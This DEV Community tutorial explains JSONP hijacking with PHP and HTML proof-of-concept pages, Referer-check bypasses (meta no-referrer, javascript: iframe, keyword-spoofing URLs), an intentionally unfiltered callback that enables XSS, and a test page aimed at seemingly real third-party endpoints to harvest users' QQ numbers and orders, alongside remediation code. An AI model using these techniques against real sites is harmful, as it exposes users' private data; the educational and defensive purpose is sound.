DEV Community

TutorialBoy
Talking about JSONP Hijacking Vulnerability

JSONP

JSONP stands for JSON with Padding, a technique built on the JSON format for requesting resources across origins.

Because of the browser's same-origin policy, XMLHttpRequest may only request resources from the current origin (domain name, protocol and port), whereas loading script resources through a <script> tag is not restricted by origin.

Principle: the client issues a cross-origin request through a <script> tag, and the server responds with the JSON data wrapped in a call to the named callback function, which the browser then executes. This way of delivering data across origins is called JSONP. Simple principle description: use

Hazards it can cause

  • JSONP data hijacking
  • XSS through an unfiltered callback name

JSONP Hijacking Example

# Server request address: http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback
<?php
// Demo JSONP endpoint: the response is hijackable because nothing ties the
// request to the calling page (no Referer or token check)
header('Content-type: application/json');
$callback = isset($_REQUEST['callback']) ? htmlspecialchars($_REQUEST['callback']) : '';
if (empty($callback)) {
    $callback = 'callback';
}
$data = array('username' => 'Pmeow-phpoop', 'email' => '3303003493@google.com');
$json = json_encode($data);
// Wrap the JSON in a call to the requested callback function
echo $callback . "(" . $json . ")";
<!-- Client request address: http://127.0.0.1/jsonp/jsonp_test.html -->
<!DOCTYPE html>
<html lang="en">
<head>
    <title>jsonp</title>
</head>
<body>
    jsonp hijack test
    <script>
        // The callback named in the request; the JSONP response calls it with the data
        function jsonCallback(data){
            alert(JSON.stringify(data));
        }
    </script>
    <!-- Cross-origin script load: not subject to the same-origin policy -->
    <script src="http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback"></script>
</body>
</html>

JSONP hijacking bypass methods

Loose (regex-based) Referer filtering
For example, when http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback outputs its data, the server verifies the Referer.

Unfortunately it only checks whether the keyword aphp.test appears somewhere in the Referer.
An attacker can therefore host the page at a URL such as http://127.0.0.1/aphp.test.html or http://127.0.0.1/attack.htm?aphp.test

Loading the endpoint from such a URL satisfies the keyword check and bypasses the Referer defence.

Empty Referer bypass

Developers sometimes allow an empty Referer when filtering, because a browser sends no Referer when the user navigates directly to a URL; that allowance can be used to bypass the check.

<!-- Use the <meta> tag to suppress the Referer -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <!-- "never" is the legacy value; the standard spelling is "no-referrer" -->
    <meta name="referrer" content="never">
    <title>jsonp without Referer</title>
</head>
<body>
    jsonp without Referer hijacking test
    <script>
        function jsonCallback(data){
            alert(JSON.stringify(data));
        }
    </script>
    <!-- Loaded without a Referer header because of the referrer policy above -->
    <script src="http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback"></script>
</body>
</html>
<!-- Use the <iframe> tag with the javascript: pseudo-protocol to load the JSONP file without a Referer -->
<!DOCTYPE html>
<html lang="en">
<head>
    <title>jsonp without Referer</title>
</head>
<body>
    jsonp without Referer hijacking test
    <!-- The frame's document has no http(s) URL, so requests from it carry no Referer header -->
    <iframe src="javascript:'<script>function jsonCallback(data){alert(JSON.stringify(data));}</script><script src=http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback></script>'" frameborder="0"></iframe>
</body>
</html>
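The keyword-style Referer check described above, next to an origin-based check that also rejects an empty Referer, run on the post's own bypass URLs. This is an added example, not code from the original post; the host names are the post's test hosts and the sample Referer values are constructed.

```javascript
// Added example, not from the original post: the keyword-style Referer check
// the post describes, next to an origin-based one, run on the post's bypass
// URLs. Host names are the post's test hosts; nothing is fetched.

const TRUSTED_HOSTS = new Set(['aphp.test']);

// Weak check: only asks whether "aphp.test" appears somewhere in the Referer.
function naiveRefererCheck(referer) {
  return typeof referer === 'string' && referer.includes('aphp.test');
}

// Hardened check: parse the Referer as a URL and compare its host exactly
// against an allow-list. A missing, empty or unparsable Referer is rejected,
// which closes the empty-Referer bypass (the meta referrer policy and the
// javascript: iframe both produce a request with no Referer header).
function strictRefererCheck(referer) {
  if (typeof referer !== 'string' || referer === '') return false;
  let url;
  try {
    url = new URL(referer);
  } catch (e) {
    return false;
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return false;
  return TRUSTED_HOSTS.has(url.hostname);
}

// Constructed Referer values: the legitimate page, the two bypass URLs
// from the post, a lookalike host, and an empty header.
const SAMPLES = [
  'http://aphp.test/jsonp/jsonp_test.html',
  'http://127.0.0.1/aphp.test.html',
  'http://127.0.0.1/attack.htm?aphp.test',
  'http://aphp.test.lookalike.example/',
  '',
];

// Evaluate both checks on each sample; only the first should pass strict.
function compareChecks(samples = SAMPLES) {
  return samples.map((referer) => ({
    referer,
    naive: naiveRefererCheck(referer),
    strict: strictRefererCheck(referer),
  }));
}

console.table(compareChecks());
```

Browsers and privacy extensions can strip the Referer for legitimate users too, so the strict check alone will reject some real visitors; that is why the remediation list below also pairs it with a CSRF token.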

Security problems caused by a user-defined callback
In typical development the callback name is made configurable so the front end can call the endpoint easily; if it is not filtered strictly, or the Content-Type is not set correctly, this leads to XSS.

Note: strictly speaking, if the output data is also attacker-controllable it can cause harm as well, but this article focuses on the callback as the output point.
Test code as follows:

<?php
// Test endpoint: the callback name is echoed unfiltered and no Content-Type
// header is sent, so the response may be rendered as HTML
$callback = isset($_REQUEST['callback']) ? $_REQUEST['callback'] : '';
if (empty($callback)) {
    $callback = 'callback';
}
$data = array('username' => 'Pmeow-phpoop', 'email' => '3303003493@google.com');
$json = json_encode($data);
echo $callback . "(" . $json . ")";

Test HTML code

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="referrer" content="never">
    <title>jsonp hijack</title>
</head>
<body>
    https://v.qq.com jsonp hijacking
    <!-- Hijacking the user's QQ number can be used for promotion -->
    <script>function jc(data){alert(JSON.stringify(data));}</script>
    <script src="http://node.video.google.com/x/api/get_2029?callback=jc&_=1542534620161"></script>

    <!-- Hijack the user's order data -->
    <script>function jc2(data){alert(JSON.stringify(data));}</script>
    <script src="http://like.video.google.com/fcgi-bin/flw_new?otype=json&sn=FollowServer&cmd=2562&pidx=0&size=30&dtype=0&type=0&callback=jc2&_=1542536629083"></script>
</body>
</html>

JSONP Remediation

  • Verify the HTTP Referer header.
  • Add a csrfToken to the request and validate it on the backend.
  • Output standard JSON and set Content-Type: application/json; charset=utf-8.
  • Strictly filter the callback function name and the data written into the JSON (prevents XSS).
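The last two remediation points, and the callback XSS test above, as an added example that is not code from the original post: a response builder that validates the callback name against an identifier pattern instead of echoing it (HTML-escaping it, as the first PHP snippet does, still does not make it a valid function name). The sample data and the hostile callback value are constructed.

```javascript
// Added example, not from the original post: a JSONP response builder that
// validates the callback name instead of echoing it, next to the unsafe
// echo from the post's test PHP. Plain functions, no server started.

// Only a JavaScript identifier, optionally dotted (e.g. "app.cb"), is
// accepted. Rejecting rather than sanitising means tags, quotes and
// parentheses never reach the response body.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 64 && CALLBACK_RE.test(name);
}

// Unsafe: the callback parameter is concatenated as-is, like the post's
// second PHP snippet, so a hostile name becomes part of the script body.
function unsafeJsonp(callback, data) {
  return { status: 200, headers: {}, body: `${callback}(${JSON.stringify(data)})` };
}

// Hardened version. Invalid callback -> 400 with nothing echoed. The body is
// JavaScript when a callback is used, so it is labelled application/javascript
// and X-Content-Type-Options stops browsers sniffing it as HTML. U+2028/U+2029
// are escaped because they are legal in JSON strings but end a JavaScript line.
function safeJsonp(callback, data) {
  if (!isValidCallback(callback)) {
    return { status: 400, headers: { 'Content-Type': 'text/plain; charset=utf-8' },
             body: 'invalid callback' };
  }
  const json = JSON.stringify(data)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: `/**/ ${callback}(${json});`,
  };
}

// Constructed sample input: the post's data shape and a hostile callback name.
const SAMPLE_DATA = { username: 'Pmeow-phpoop', email: '3303003493@google.com' };
const HOSTILE_CALLBACK = '<script>alert(1)</script>';

console.log(unsafeJsonp(HOSTILE_CALLBACK, SAMPLE_DATA).body); // hostile name echoed
console.log(safeJsonp(HOSTILE_CALLBACK, SAMPLE_DATA).status); // 400
```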

Source :- https://tutorialboy24.blogspot.com/2023/07/talking-about-jsonp-hijacking.html
